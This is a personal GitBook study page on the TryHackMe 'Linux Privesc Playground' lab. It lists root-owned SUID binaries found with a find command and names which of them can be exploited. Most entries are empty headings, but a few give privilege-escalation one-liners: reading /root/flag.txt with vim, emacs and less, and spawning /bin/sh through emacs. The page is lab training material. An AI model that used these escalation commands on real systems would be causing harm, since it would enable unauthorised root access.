Cyber Security / Ethical Hacking
  • Prologue
  • CTF/OSCP Prep
    • Fundamentals
      • Linux
        • Basics
        • Bash Scripting
      • Windows
        • Basics
        • PowerShell
          • Scripting
        • CMD
      • Kali Survivor Skills
    • Information Gathering
      • Passive Recon
      • Active Recon
    • Enumeration
      • Common Ports
      • Vulnerability Analysis
    • Exploitation
      • Shells
  • Binary Exploitation / Exploit Development
    • Useful tools and techniques for Binary Exploitation
    • Shellcoders Handbook
      • Chapter 2 - Stack Overflows
        • Linux Buffer Overflow With Command Injection
        • Linux Buffer Overflow Without Shellcode
      • Chapter 3 - Shellcode
  • TryHackMe
    • Linux Fundamentals
      • Linux Challenges
      • RP: tmux
      • Common Linux Privesc
    • Advent of Cyber
      • Inventory Management
      • Arctic Forum
      • Evil Elf
      • Training
      • Ho-Ho-Hosint
      • Data Elf-iltration
      • Skilling Up
      • SUID Shenanigans
      • Requests
      • Metasploit-a-ho-ho-ho
      • Elf Applications
      • Elfcryption
      • Accumulate
      • Unknown Storage
    • Web Application Security
      • Web Fundamentals
      • Juice Shop
      • WebAppSec 101
    • Linux Privesc Playground
    • Intro to x86-64
    • Ninja Skills
    • CC: Radare2
    • Reversing ELF
    • Intro to Python
    • ToolsRus
  • Programming
    • Python
      • Simple TCP Port Scanner/ Banner Grabber
      • Botnet
      • Keylogger
      • Nmap Scanner
    • Golang
      • Execute Commands
      • MAC changer
      • TCP Port Scanner
      • TCP Port Scanner (improved with goroutines)
      • GoNmap Scanner
  • Protostar
    • Stack 0
    • Stack 1
    • Stack 2
  • Web App Pentesting
    • Recon
    • Authentication (Portswigger Academy)
      • Vulnerabilities in password-based login
        • Username Enumeration via different responses
        • Username enumeration via subtly different responses
        • Username enumeration via response timing
        • Broken brute-force protection, IP block
        • Username enumeration via account lock
        • Broken brute-force protection, multiple credentials per request
      • Vulnerabilities in multi-factor authentication
        • 2FA simple bypass
        • 2FA Broken Logic
        • 2FA bypass using a brute-force attack
      • Vulnerabilities in other authentication mechanisms
    • Broken Acess Controls
      • Insecure direct object references (IDOR)
        • Insecure direct object references lab
  • HackTheBox
    • Active
      • Untitled
      • Blunder
Powered by GitBook
On this page
  • arp
  • cut
  • base64
  • tail
  • ul
  • shuf
  • php
  • openssl
  • file
  • tclsh
  • env
  • diff
  • strace
  • rlwrap
  • expand
  • fold
  • vim
  • xargs
  • timeout
  • expect
  • jq
  • readelf
  • ionice
  • time
  • unshare
  • taskset
  • emacs
  • flock
  • xxd
  • setarch
  • python
  • uniq
  • sort
  • head
  • stdbuf
  • nl
  • find
  • rsync
  • pg
  • fmt
  • nice
  • od
  • gdb
  • unexpand
  • start-stop-daemon
  • sed
  • logsave
  • dash
  • cp
  • ksh
  • bash
  • more
  • ip
  • cat
  • zsh
  • less
  • dd
  • grep
  • run-parts
  • date

Was this helpful?

  1. TryHackMe

Linux Privesc Playground

PreviousWebAppSec 101NextIntro to x86-64

Last updated 5 years ago

Was this helpful?

All the files with SUID bit set that belong to root:

-bash-4.2$ find / -user root -perm /4000 2>/dev/null
/usr/sbin/arp
/usr/sbin/node
/usr/sbin/pppd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/pt_chown
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/wget
/usr/bin/cut
/usr/bin/base64
/usr/bin/traceroute6.iputils
/usr/bin/tail
/usr/bin/aria2c
/usr/bin/ul
/usr/bin/shuf
/usr/bin/php5
/usr/bin/gpasswd
/usr/bin/make
/usr/bin/openssl
/usr/bin/file
/usr/bin/tclsh8.5
/usr/bin/env
/usr/bin/diff
/usr/bin/watch
/usr/bin/strace
/usr/bin/rlwrap
/usr/bin/expand
/usr/bin/fold
/usr/bin/vim.basic
/usr/bin/timeout
/usr/bin/xargs
/usr/bin/expect
/usr/bin/chsh
/usr/bin/jq
/usr/bin/perl5.14.2
/usr/bin/readelf
/usr/bin/sudo
/usr/bin/ionice
/usr/bin/sudoedit
/usr/bin/unshare
/usr/bin/time
/usr/bin/taskset
/usr/bin/mtr
/usr/bin/emacs23-x
/usr/bin/flock
/usr/bin/tee
/usr/bin/xxd
/usr/bin/setarch
/usr/bin/python2.7
/usr/bin/uniq
/usr/bin/head
/usr/bin/sort
/usr/bin/newgrp
/usr/bin/stdbuf
/usr/bin/nl
/usr/bin/perl
/usr/bin/tftp
/usr/bin/find
/usr/bin/passwd
/usr/bin/rsync
/usr/bin/docker
/usr/bin/pg
/usr/bin/fmt
/usr/bin/nice
/usr/bin/od
/usr/bin/chfn
/usr/bin/gimp-2.6
/usr/bin/gdb
/usr/bin/unexpand
/sbin/dmsetup
/sbin/start-stop-daemon
/sbin/logsave
/bin/sed
/bin/mount
/bin/mv
/bin/cp
/bin/dash
/bin/ksh93
/bin/chmod
/bin/ping
/bin/chown
/bin/fusermount
/bin/bash
/bin/nano
/bin/ip
/bin/more
/bin/cat
/bin/zsh4
/bin/less
/bin/su
/bin/busybox
/bin/dd
/bin/grep
/bin/run-parts
/bin/ping6
/bin/date
/bin/bsd-csh
/bin/umount

All the binaries that can be exploited in the list above:

arp
node
wget
cut
base64
tail
ul
aria2c
shuf
php5
make
openssl
file
tclsh
env
diff
watch
strace
rlwrap
expand
fold
vim
xargs
timeout
expect
jq
perl
readelf
ionice
time
unshare
taskset
mtr
emacs
flock
tee
xxd
setarch
python
uniq
sort
head
stdbuf
nl
tftp
find
rsync
pg
docker
fmt
nice
od
gdb
gimp
unexpand
dmsetup
start-stop-daemon
sed
mount
logsave
mv
dash
cp
ksh
chmod
chown
bash
nano
more
ip
cat
zsh
less
busybox
dd
grep
run-parts
date

arp

cut

base64

tail

ul

shuf

php

openssl

file

tclsh

env

diff

strace

rlwrap

expand

fold

vim

vim /root/flag.txt

getting a shell

xargs

getting a shell

timeout

expect

jq

readelf

ionice

time

unshare

taskset

emacs

emacs /root/flag.txt

getting a shell

emacs -Q -nw --eval '(term "/bin/sh")'

flock

xxd

setarch

python

getting shell

uniq

sort

head

stdbuf

nl

find

getting shell

rsync

pg

getting shell

fmt

nice

od

gdb

unexpand

start-stop-daemon

sed

getting shell

logsave

dash

cp

ksh

getting shell

bash

more

ip

cat

zsh

less

less /root/flag.txt

dd

grep

run-parts

date